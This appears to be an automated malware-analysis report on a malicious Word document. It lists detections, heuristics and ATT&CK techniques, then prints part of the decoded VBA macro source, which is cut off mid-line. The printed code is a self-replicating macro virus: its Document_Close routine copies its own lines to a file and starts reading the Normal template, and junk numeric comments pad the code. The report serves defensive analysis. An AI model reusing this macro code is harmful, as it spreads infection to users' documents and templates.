Verdict: MALICIOUS
Risk Score: 280

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing VBA macros, as indicated by multiple high-severity heuristics including OLE_VBA_AUTOOPEN, OLE_VBA_DOCOPEN, and OLE_VBA_AUTOCLOSE. The VBA script within 'macros.bas' attempts to delete a file 'c:\cont.dbl' and open a new file with the same name for output, suggesting it is part of a payload delivery or execution chain. The presence of legacy WordBasic auto-exec markers further supports its malicious nature.
Heuristics (6)

- ClamAV: Win.Trojan.W97M-9 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.W97M-9
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 71030 bytes |

SHA-256: 4d6cec0881ddf76eab31f03c450204ef3d593403a7f88d63945c7581cb3bf41c

Detection:
- ClamAV: Doc.Trojan.Class-15
- Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
'317634377294330679702411,37557275051744E+223176343772943306797024131763437729433067970241
Dim flagaltro As Boolean
'13413809124248153858413,32868849009586E+2013413809124248153858411341380912424815385841
Dim count As Integer
'28377994413878225445161,1005626000347E+2128377994413878225445162837799441387822544516
Dim bry As Variant
'332755970561804414466566,00429687112678E+213327559705618044144665633275597056180441446656
On Error Resume Next
'157673226241900907680362,99722246746756E+211576732262419009076803615767322624190090768036
stato = ActiveDocument.Saved
'16974400003171604489005,38360832380816E+2016974400003171604489001697440000317160448900
Application.EnableCancelKey = Not -1
'572893799045860269945763,35731231262638E+225728937990458602699457657289379904586026994576
' .ConfirmConversions = 0
'231818895366185350609001,43388114559268E+222318188953661853506090023181889536618535060900
' .SaveNormalPrompt = 0
'18343993694519228411,73386012102998E+1818343993694519228411834399369451922841
'268114425642836393260847,60477950019283E+212681144256428363932608426811442564283639326084
Kill "c:\cont.dbl"
'73679673600225636449441,66248199470021E+2173679673600225636449447367967360022563644944
Open "c:\cont.dbl" For Output As #1
'5180084960422569150491,16910117022253E+20518008496042256915049518008496042256915049
For count = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
'844286003562365207595561,99691166844511E+228442860035623652075955684428600356236520759556
Next count
'693368957613529999630442,44759216412187E+226933689576135299996304469336895761352999963044
Do Until MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(count, 1) = "End Sub"
'878132468891511965456001,32770595875367E+228781324688915119654560087813246889151196545600
count = count + 1
'43971154249202327865648,89658978892739E+2043971154249202327865644397115424920232786564
'6375064336230159241001,46727996889993E+20637506433623015924100637506433623015924100
'2357879364660854990411,55821634448416E+20235787936466085499041235787936466085499041
If MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(count, 1) = "Private Sub Document_Open()" Then Exit For
'15275476836431937245616,5980473899212E+2015275476836431937245611527547683643193724561
'434843438413728213692811,62118926130874E+224348434384137282136928143484343841372821369281
Print #1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(count, 1)
'45270020892057956006099,31637113863953E+2045270020892057956006094527002089205795600609
Loop
'487530816015805708503042,83046180400329E+224875308160158057085030448753081601580570850304
Print #1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(count, 1)
'838143030493092828014242,59223224463948E+228381430304930928280142483814303049309282801424
'349121751043166324154011,10543263300822E+223491217510431663241540134912175104316632415401
'490910492252081576750491,0218678672392E+224909104922520815767504949091049225208157675049
flagio = False
'377085909695752615716002,16923033036485E+223770859096957526157160037708590969575261571600
Set bry = NormalTemplate.VBProject.VBComponents.Item(1)
'6585809409800652297645,27294343513498E+20658580940980065229764658580940980065229764
For count = 1 To bry.CodeModule.CountOfLines
'125762767364142338321005,20951930590336E+211257627673641423383210012576276736414233832100
flagaltro = True
'625650169002151030192641,34579240354932E+226256501690021510301926462565016900215103019264
If Trim(bry.CodeModule.Lines(count + 1, 1)) = "Dim stato As Boolean" Then
'51236964003939219274242,01833636142341E+2151236964003939219274
```

... (truncated)